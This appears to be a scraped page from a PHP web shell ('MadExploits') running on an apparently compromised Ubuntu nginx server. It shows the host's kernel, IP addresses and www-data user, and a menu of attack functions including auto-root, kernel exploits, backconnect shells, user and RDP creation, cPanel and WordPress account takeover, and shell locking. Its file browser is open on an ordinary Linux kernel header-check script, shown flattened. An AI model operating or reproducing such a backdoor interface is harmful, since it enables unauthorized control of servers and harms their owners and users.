Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-160 /
scripts /
atomic /
[ HOME SHELL ]
Name
Size
Permission
Action
fallbacks
[ DIR ]
drwxr-xr-x
atomic-tbl.sh
3.33
KB
-rwxr-xr-x
atomics.tbl
1.13
KB
-rwxr-xr-x
check-atomics.sh
742
B
-rwxr-xr-x
gen-atomic-fallback.sh
5.5
KB
-rwxr-xr-x
gen-atomic-instrumented.sh
3.76
KB
-rwxr-xr-x
gen-atomic-long.sh
2.15
KB
-rwxr-xr-x
gen-atomics.sh
626
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check-atomics.sh
#!/bin/sh # SPDX-License-Identifier: GPL-2.0 # # Check if atomic headers are up-to-date ATOMICDIR=$(dirname $0) ATOMICTBL=${ATOMICDIR}/atomics.tbl LINUXDIR=${ATOMICDIR}/../.. echo '' | sha1sum - > /dev/null 2>&1 if [ $? -ne 0 ]; then printf "sha1sum not available, skipping atomic header checks.\n" exit 0 fi cat <<EOF | linux/atomic/atomic-instrumented.h linux/atomic/atomic-long.h linux/atomic/atomic-arch-fallback.h EOF while read header; do OLDSUM="$(tail -n 1 ${LINUXDIR}/include/${header})" OLDSUM="${OLDSUM#// }" NEWSUM="$(sed '$d' ${LINUXDIR}/include/${header} | sha1sum)" NEWSUM="${NEWSUM%% *}" if [ "${OLDSUM}" != "${NEWSUM}" ]; then printf "warning: generated include/${header} has been modified.\n" fi done exit 0
Close